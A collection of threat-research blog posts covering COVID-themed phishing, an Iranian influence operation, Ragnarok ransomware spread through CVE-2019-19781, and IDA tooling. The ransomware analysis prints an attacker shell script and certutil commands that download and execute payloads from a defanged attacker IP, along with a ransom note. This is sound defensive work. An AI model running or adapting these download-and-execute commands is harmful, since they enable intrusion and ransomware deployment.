Figure 13 shows that there was indeed an IMAGE_DOS_SIGNATURE (“MZ”) at this location. I used idc.get_bytes() to dump the unpacked binary from the fake heap location and saved it for analysis.

Figure 13: Dumping the unpacked binary

Through Bochs IDB mode, I was also able to use the interactive debugger interface of IDA Pro to experiment with manipulating execution and traversing a different branch to unpack another payload for this malware as well.

Conclusion

Although dynamic analysis is sometimes the fastest road, setting it up and navigating the minutiae detract from my focus, so I’ve developed an eye for routines that I can likely emulate in Bochs to dodge those distractions while still getting answers. Injecting code into an IDB broadens the set of functions that I can do this with, letting me get more out of Bochs. This in turn lets me do more on-the-fly experimentation, one-off string decodes, or validation of hypotheses before attacking something at scale. It also allows me to experiment dynamically with samples that won’t load correctly anyway, such as unpacked code with damaged or incorrect PE headers.

I’ve shared the Code Grafting tools as part of the flare-ida GitHub repository. To use this for your own analyses:

In IDA Pro’s IDAPython prompt, run code_grafter.py or import it as a module.
Instantiate a CodeGrafter object and invoke its graftCodeToIdb() method:
- CodeGrafter().graftCodeToIdb()
Use Bochs in IDB mode to conveniently execute your modified sample and experiment away!

This post makes it clear just how far I’ll go to avoid breaking eye contact with IDA. If you’re a fan of using Bochs with IDA too, then this is my gift to you. Enjoy!

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Threat Research

FireEye Mandiant Threat Intelligence

27 March 2020 at 19:00

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovery themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in currency relevant to the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different @gmx.com email addresses and had password protected Microsoft Word document attachments using the file name “COVID 19 Relief.doc” (Figure 3). The emails appear to be auto generated and follow the format <name>.<name><SevenNumberString>@gmx.com. When these documents were opened and macros enabled, they would drop and execute a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.
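The sender address format described above lends itself to a simple pattern match. The sketch below assumes the two name components are purely alphabetic, which the description does not state, and such a pattern will also match legitimate addresses, so treat a hit as a weak signal to combine with other indicators. The names are illustrative.

```python
import re

# <name>.<name><SevenNumberString>@gmx.com, assuming alphabetic names.
SENDER_PATTERN = re.compile(r"^[a-z]+\.[a-z]+\d{7}@gmx\.com$", re.IGNORECASE)


def matches_campaign_format(address):
    """Return True if the address fits the described sender format."""
    return SENDER_PATTERN.match(address.strip()) is not None


checks = {
    "john.smith1234567@gmx.com": matches_campaign_format("john.smith1234567@gmx.com"),
    "john.smith123456@gmx.com": matches_campaign_format("john.smith123456@gmx.com"),
    "john1234567@gmx.com": matches_campaign_format("john1234567@gmx.com"),
}
```

Only the first address has two dot-separated names followed by exactly seven digits, so it is the only one that matches.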

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, employed the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S.- and Canada-based financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

http://marchadvertisingnetwork4[.]com/post.php
http://marchadvertisingnetwork5[.]com/post.php
http://marchadvertisingnetwork6[.]com/post.php
http://marchadvertisingnetwork7[.]com/post.php
http://marchadvertisingnetwork8[.]com/post.php
http://marchadvertisingnetwork9[.]com/post.php
http://marchadvertisingnetwork10[.]com/post.php

Figure 1: Example lure using CAD

Figure 2: Example lure using AUD

Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.

Figure 4: Email lure referencing business grants and loans

Figure 5: SBA-themed message

Figure 6: Office 365 phishing page

Implications

Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new; they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism, will be especially prepared to meet this challenge.

"Distinguished Impersonator" Information Operation That Previously Impersonated U.S. Politicians and Journalists on Social Media Leverages Fabricated U.S. Liberal Personas to Promote Iranian Interests

Threat Research

Alice Revelli

12 February 2020 at 12:30

In May 2019, FireEye Threat Intelligence published a blog post exposing a network of English-language social media accounts that engaged in inauthentic behavior and misrepresentation that we assessed with low confidence was organized in support of Iranian political interests. Personas in that network impersonated candidates for U.S. House of Representatives seats in 2018 and leveraged fabricated journalist personas to solicit various individuals, including real journalists and politicians, for interviews intended to bolster desired political narratives. Since the release of that blog post, we have continued to track activity that we believe to be part of that broader operation, reporting our findings to our intelligence customers using the moniker “Distinguished Impersonator.”

Today, Facebook took action against a set of eleven accounts on the Facebook and Instagram platforms that they shared with us and, upon our independent review, we assessed were related to the broader Distinguished Impersonator activity set we’ve been tracking. We separately identified a larger set of just under 40 related accounts active on Twitter against which Twitter has also taken recent enforcement action. In this blog post, we provide insights into the recent activity and behavior of some of the personas in the Distinguished Impersonator network, in order to exemplify the tactics information operations actors are employing in their attempts to surreptitiously amplify narratives and shape political attitudes.

Activity Overview

Personas in the Distinguished Impersonator network have continued to engage in activity similar to that we previously reported on publicly in May 2019, including social media messaging directed at politicians and media outlets; soliciting prominent individuals including academics, journalists, and activists for “media” interviews; and posting what appear to be videoclips of interviews of unknown provenance conducted with such individuals to social media. The network has also leveraged authentic media content to promote desired political narratives, including the dissemination of news articles and videoclips from Western mainstream media outlets that happen to align with Iranian interests, and has amplified the commentary of real individuals on social media.

Outside of impersonating prominent individuals such as journalists, other personas in the network have primarily posed as U.S. liberals, amplifying authentic content from other social media users broadly in line with that proclaimed political leaning, as well as material more directly in line with Iranian political interests, such as videoclips of a friendly meeting between U.S. President Trump and Crown Prince of Saudi Arabia Mohammad Bin Salman accompanied by pro-U.S. Democrat commentary, videoclips of U.S. Democratic presidential candidates discussing Saudi Arabia's role in the conflict in Yemen, and other anti-Saudi, anti-Israeli, and anti-Trump messaging. Some of this messaging has been directed at the social media accounts of U.S. politicians and media outlets (Figure 1).

Figure 1: Twitter accounts in the Distinguished Impersonator network posting anti-Israeli, anti-Saudi, and anti-Trump content

We observed direct overlap between six of the personas operating on Facebook platforms and those operating on Twitter. In one example of such overlap, the “Ryan Jensen” persona posted to both Twitter and Instagram a videoclip showing antiwar protests in the U.S. following the killing of Qasem Soleimani, commander of the Islamic Revolutionary Guards Corps’ Quds Force (IRGC-QF) by a U.S. airstrike in Baghdad in January 2020 (Figure 2). Notably, though the strike motivated some limited activity by personas in the network, the Distinguished Impersonator operation has been active since long before that incident.

Figure 2: Posts by the “Ryan Jensen” persona on Twitter and Instagram disseminating a videoclip of antiwar protests in the U.S. following the killing of Qasem Soleimani

Accounts Engaged in Concerted Replies to Influential Individuals on Twitter, Posed as Journalists and Solicited Prominent Individuals for “Media” Interviews

Personas on Twitter that we assess to be a part of the Distinguished Impersonator operation engaged in concerted replies to tweets by influential individuals and organizations, including members of the U.S. Congress and other prominent political figures, journalists, and media outlets. The personas responded to tweets with specific narratives aligned with Iranian interests, often using identical hashtags. The personas sometimes also responded with content unrelated to the tweet they were replying to, again with messaging aligned with Iranian interests. For example, a tweet regarding a NASA mission received replies from personas in the network pertaining to Iran’s seizure of a British oil tanker in July 2019. Other topics the personas addressed included U.S.-imposed sanctions on Iran and U.S. President Trump’s impeachment (Figure 3). While it is possible that the personas may have conducted such activity in the hope of eliciting responses from the specific individuals and organizations they were replying to, the multiple instances of personas responding to seemingly random tweets with unrelated political content could also indicate an intent to reach the broader Twitter audiences following those prominent accounts.

Figure 3: Twitter accounts addressing U.S.-imposed sanctions on Iran (left) and the Trump impeachment (right)

Instagram accounts that we assess to be part of the Distinguished Impersonator operation subsequently highlighted this Twitter activity by posting screen recordings of an unknown individual(s) scrolling through the responses by the personas and authentic Twitter users to prominent figures’ tweets. The Instagram account @ryanjensen7722, for example, posted a video scrolling through replies to a tweet by U.S. Senator Cory Gardner commenting on “censorship and oppression.” The video included a reply posted by @EmilyAn1996, a Twitter account we have assessed to be part of the operation, discussing potential evidence surrounding President Trump’s impeachment trial.

Figure 4: Screenshot of video posted by @ryanjensen7722 on Instagram scrolling through Twitter replies to a tweet by U.S. Senator Cory Gardner

We also observed at least two personas posing as journalists working at legitimate U.S. media outlets openly solicit prominent individuals via Twitter, including Western academics, activists, journalists, and political advisors, for interviews (Figure 5). These individuals included academic figures from organizations such as the Washington Institute for Near East Policy and the Foreign Policy Research Institute, as well as well-known U.S. conservatives opposed to U.S. President Trump and a British MP. The personas solicited the individuals’ opinions regarding topics relevant to Iran’s political interests, such as Trump’s 2020 presidential campaign, the Trump administration’s relationship with Saudi Arabia, Trump’s “deal of the century,” referring to a peace proposal regarding the Israeli-Palestinian conflict authored by the Trump administration, and a tweet by President Trump regarding former UK Prime Minister Theresa May.

Figure 5: The “James Walker” persona openly soliciting interviews from academics and journalists on Twitter

Twitter Personas Posted Opinion Polls To Solicit Views on Topics Relevant to Iranian Political Interests

Some of the personas on Twitter also posted opinion polls to solicit other users’ views on political topics, possibly for the purpose of helping to build a larger follower base through engagement. One account, @CavenessJim, posed the question: “Do you believe in Trump’s foreign policies especially what he wants to do for Israel which is called ‘the deal of the century’?” (The poll provided two options: “Yes, I do.” and “No, he cares about himself.” Of the 2,241 votes received, 99% of participants voted for the latter option, though we note that we have no visibility into the authenticity of those “voters”.) Another account, @AshleyJones524, responded to a tweet by U.S. Senator Lindsey Graham by posting a poll asking if the senator was “Trump’s lapdog,” tagging seven prominent U.S. politicians and one comedian in the post; all 24 respondents to the poll voted in the affirmative. As with the Instagram accounts’ showcasing of replies to the tweets of prominent individuals, Instagram accounts in the network also highlighted polls posted by the personas on Twitter (Figure 6).

Figure 6: Twitter account @CavenessJim posts Twitter poll (left); Instagram account @ryanjensen7722 posts video highlighting @CavenessJim's Twitter poll (right)

Videoclips of Interviews with U.S., U.K., and Israeli Individuals Posted on Iran-Based Media Outlet Tehran Times

Similar to the personas we reported on in May 2019, some of the more recently active personas posted videoclips on Facebook, Instagram, and Twitter of interviews with U.S., UK, and Israeli individuals including professors, politicians, and activists expressing views on topics aligned with Iranian political interests (Figure 7). We have thus far been unable to determine the provenance of these interviews, and note that, unlike some of the previous cases we reported on in 2019, the personas in this more recent iteration of activity did not themselves proclaim to have conducted the interviews they promoted on social media. The videoclips highlighted the interviewees’ views on issues such as U.S. foreign policy in the Middle East and U.S. relations with its political allies. Notably, we observed that at least some of the videoclips that were posted by the personas to social media have also appeared on the website of the Iranian English-language media outlet Tehran Times, both prior to and following the personas' social media posts. In other instances, Tehran Times published videoclips that appeared to be different segments of the same interviews that were posted by Distinguished Impersonator personas. Tehran Times is owned by the Islamic Propagation Organization, an entity that falls under the supervision of the Iranian Supreme Leader Ali Khamenei.

Figure 7: Facebook and Instagram accounts in the network posting videoclips of interviews with an activist and a professor

Conclusion

The activity we’ve detailed here does not, in our assessment, constitute a new activity set, but rather a continuation of an ongoing operation we believe is being conducted in support of Iranian political interests that we’ve been tracking since last year. It illustrates that the actors behind this operation continue to explore elaborate methods for leveraging the authentic political commentary of real individuals to furtively promote Iranian political interests online. The continued impersonation of journalists and the amplification of politically-themed interviews of prominent individuals also provide additional examples of what we have long referred to internally as the “media-IO nexus”, whereby actors engaging in online information operations actively leverage the credibility of the legitimate media environment to mask their activities, whether that be through the use of inauthentic news sites masquerading as legitimate media entities, deceiving legitimate media entities in order to promote desired political narratives, defacing media outlets’ websites to disseminate disinformation, spoofing legitimate media websites, or, as in this case, attempting to solicit commentary likely perceived as expedient to the actors’ political goals by adopting fake media personas.

Nice Try: 501 (Ransomware) Not Implemented

Threat Research

Matt Bromiley

24 January 2020 at 17:00

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.

Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system
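The decode-and-decompress step performed by de.py can be sketched as follows. The contents of de.py are not reproduced in this post, so the key, the repeating-key XOR scheme, and the function names below are assumptions for illustration only; the sketch runs against synthetic data rather than the real piz.Lan.

```python
import io
import zipfile


def xor_decode(blob: bytes, key: bytes) -> bytes:
    """XOR every byte of blob with the repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def list_decoded_zip(blob: bytes, key: bytes) -> list:
    """Decode the blob and list archive members without writing them to disk."""
    decoded = xor_decode(blob, key)
    with zipfile.ZipFile(io.BytesIO(decoded)) as archive:
        return archive.namelist()


# Synthetic round trip: build a small ZIP, encode it, then recover it.
HYPOTHETICAL_KEY = b"\x5a"  # placeholder, NOT the key used by de.py
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("scan.py", "print('placeholder')")
encoded = xor_decode(buffer.getvalue(), HYPOTHETICAL_KEY)

print(list_decoded_zip(encoded, HYPOTHETICAL_KEY))
```

Listing the members in memory, rather than extracting them, keeps an analyst from accidentally dropping the payloads onto the analysis host.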

piz.Lan -> .new.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.new.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename	Functionality	MD5
x86.dll	32-bit Downloader	9aa67d856e584b4eefc4791d2634476a
x64.dll	64-bit Downloader	55b40e0068429fbbb16f2113d6842ed2
scan.py	Python socket scanner	b0acb27273563a5a2a5f71165606808c
xp_eternalblue.replay	Exploit replay file	6cf1857e569432fcfc8e506c8b0db635
eternalblue.replay	Exploit replay file	9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py
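For responders who have recovered files from a suspect appliance, the hashes in Table 1 can be checked with a short script. This is a minimal sketch; the function names are our own, and it only compares files whose names match the table, so renamed copies would need a full-directory hash sweep instead.

```python
import hashlib
from pathlib import Path

# MD5 values copied from Table 1
TABLE_1_MD5 = {
    "x86.dll": "9aa67d856e584b4eefc4791d2634476a",
    "x64.dll": "55b40e0068429fbbb16f2113d6842ed2",
    "scan.py": "b0acb27273563a5a2a5f71165606808c",
    "xp_eternalblue.replay": "6cf1857e569432fcfc8e506c8b0db635",
    "eternalblue.replay": "9e408d947ceba27259e2a9a5c71a75a8",
}


def md5_of(path, chunk_size=65536):
    """Hash a file in chunks so large files are not read into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def match_known_files(directory):
    """Return {filename: bool} for each Table 1 name present in directory."""
    results = {}
    for name, expected in TABLE_1_MD5.items():
        candidate = Path(directory) / name
        if candidate.is_file():
            results[name] = md5_of(candidate) == expected
    return results
```

Calling match_known_files on a directory of recovered artifacts returns True for any file whose name and MD5 both match the table, and False for a same-named file with different contents.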

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:

Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.

Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique T1105 within MITRE’s ATT&CK framework).
Execute the downloaded binary since1969.exe, located in C:\Users\Public.
Delete the URL from the current user’s certificate cache.

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll
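The certutil usage shown in Figures 5 and 6 can be hunted for in process command-line logs. The following is a minimal sketch of such a check; the regular expression and the labels it returns are our own illustration and are not the logic behind any FireEye detection.

```python
import re

# Matches certutil invoked with both the urlcache and f switches,
# written with either a dash or a slash prefix.
CERTUTIL_URLCACHE_RE = re.compile(
    r"\bcertutil(?:\.exe)?\b.*[-/]urlcache\b.*[-/]f\b",
    re.IGNORECASE,
)


def classify(cmdline: str):
    """Label a command line as 'download', 'cache-delete', or None."""
    if not CERTUTIL_URLCACHE_RE.search(cmdline):
        return None
    if re.search(r"\bdelete\s*$", cmdline, re.IGNORECASE):
        return "cache-delete"
    return "download"


# Command lines as they appear (defanged) in the DLL strings
observed = [
    "certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe",
    "cmd.exe /c C:/Users/Public/since1969.exe",
    "certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete",
]
labels = [classify(line) for line in observed]
print(labels)
```

Administrators do occasionally use certutil this way, so a hit is a lead to investigate rather than proof of compromise; a download followed shortly by a cache-delete for the same URL is the more distinctive pairing.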

Although neither patch32 nor patch64 was available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 7). This file, uploaded on November 12, 2019, is an instance of the publicly available Meterpreter backdoor. Additional analysis confirmed that this binary communicated with 45[.]120[.]53[.]214 over TCP port 1234.

Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.
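Pivoting on a PDB string starts with pulling it out of the binary. The following is a minimal sketch that scans raw bytes for Windows-style paths ending in .pdb and extracts the user profile name; the function names are our own, and a production tool would parse the PE debug directory rather than pattern-match.

```python
import re

# A drive letter, a backslash, printable ASCII, then ".pdb" (shortest match)
PDB_PATH_RE = re.compile(rb"[A-Za-z]:\\[\x20-\x7e]{1,255}?\.pdb", re.IGNORECASE)


def find_pdb_paths(data: bytes) -> list:
    """Return every PDB-looking path found in the raw bytes."""
    return [m.group(0).decode("ascii") for m in PDB_PATH_RE.finditer(data)]


def pdb_usernames(paths) -> list:
    """Pull the profile name out of paths of the form C:\\Users\\<name>\\..."""
    names = []
    for path in paths:
        parts = path.split("\\")
        if len(parts) > 2 and parts[1].lower() == "users":
            names.append(parts[2])
    return names


# Synthetic buffer containing the PDB string quoted above
blob = (
    b"\x00\x01RSDS"
    + rb"C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb"
    + b"\x00\x00"
)
paths = find_pdb_paths(blob)
print(paths, pdb_usernames(paths))
```

The extracted profile name can then be used as a search keyword, as we did with ragnarok.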

Further analysis and sandboxing of this binary brought all the pieces together: this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.

Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 9, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if you suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter and EternalBlue. Table 2 contains several specific detection names to assist in detection of this activity.

Signature Name

CERTUTIL.EXE DOWNLOADER (UTILITY)

CURL Downloading Shell Script

ETERNALBLUE EXPLOIT

METERPRETER (Backdoor)

METERPRETER URI (STAGER)

SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type	Indicator	Notes
Network	45[.]120[.]53[.]214
Network	198[.]44[.]227[.]126
Host	91dd06f49b09a2242d4085703599b7a7	piz.Lan
Host	01af5ad23a282d0fd40597c1024307ca	de.py
Host	bd977d9d2b68dd9b12a3878edd192319	ld.sh
Host	0caf9be8fd7ba5b605b7a7b315ef17a0	.new.zip
Host	9aa67d856e584b4eefc4791d2634476a	x86.dll
Host	55b40e0068429fbbb16f2113d6842ed2	x64.dll
Host	b0acb27273563a5a2a5f71165606808c	scan.py
Host	6cf1857e569432fcfc8e506c8b0db635	xp_eternalblue.replay
Host	9e408d947ceba27259e2a9a5c71a75a8	eternalblue.replay
Host	e345c861058a18510e7c4bb616e3fd9f	avpass.exe
Host	48452dd2506831d0b340e45b08799623	since1969.exe
Email Address	asgardmaster5@protonmail[.]com	From ransom note
Email Address	ragnar0k@ctemplar[.]com	From ransom note
Email Address	j.jasonm@yandex[.]com	From ransom note

Table 3: Collection of IOCs from this blog post
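The network and email indicators in Table 3 are defanged with [.] (and URLs earlier in the post with hxxp) so that they cannot be clicked by accident. Before loading them into a blocklist or search tool they need to be restored. The helpers below are a minimal sketch with names of our own choosing.

```python
def refang(indicator: str) -> str:
    """Restore a defanged indicator so tools can match it."""
    return (
        indicator.replace("[.]", ".")
        .replace("hxxps://", "https://")
        .replace("hxxp://", "http://")
    )


def defang(indicator: str) -> str:
    """Defang an IP address, domain, or email address for safe sharing."""
    out = indicator.replace("https://", "hxxps://").replace("http://", "hxxp://")
    return out.replace(".", "[.]")


# Round trip on an address written with ordinary dots
plain = "45.120.53.214"
shared = defang(plain)
print(shared)
print(refang(shared) == plain)
```

Note that defang replaces every dot, including those in file names within a URL path, which is harmless for sharing but worth knowing when comparing strings.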

FIDL: FLARE’s IDA Decompiler Library

Threat Research

Ryan Warns

25 November 2019 at 20:00

IDA Pro and the Hex-Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the Hex-Rays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback. For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.
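For readers unfamiliar with the visitor pattern, the idea can be illustrated outside of IDA. The sketch below is an analogy only: it uses Python's standard ast module on Python source, not the Hex-Rays API, but the shape is the same, with a visitor class receiving a callback per node and deciding what to do based on the node type.

```python
import ast


class CallCollector(ast.NodeVisitor):
    """Record the name of every directly named function call, in visit order."""

    def __init__(self):
        self.calls = []

    def visit_Call(self, node):
        # Callback fired for each call node in the tree
        if isinstance(node.func, ast.Name):
            self.calls.append(node.func.id)
        self.generic_visit(node)  # keep descending into the arguments


source = "x = outer(inner(1), 2)\ny = other(x + 3)"
collector = CallCollector()
collector.visit(ast.parse(source))
print(collector.calls)  # ['outer', 'inner', 'other']
```

Even in this small case the callback sees one node at a time with no knowledge of its parent or siblings, which is the limitation the next section describes.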

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

The order in which nodes are visited is not always obvious from the decompiler output
When visiting a node, we have no context about where we are in the AST
Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
The number of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
Abstracts away the minutiae of processing the AST
Provides helper implementations for commonly needed functionality when working with the decompiler
Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When this object is constructed, FIDL parses the AST for us and provides a high-level summary of a function using information extracted via the decompiler, including APIs called, their parameters, and a summary of local variables and parameters for the function.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.

Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.

Figure 2: The default rendering of the AST of a function

Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts to leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the Hex-Rays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.

Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress, malware commonly resolves needed imports manually by walking the Export Address Table (EAT), hashing each of a DLL’s export names, and comparing the results against pre-computed values. As analysts, being able to quickly or automatically map these functions to their intended API makes it easier for us to identify which functions we should spend time analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.

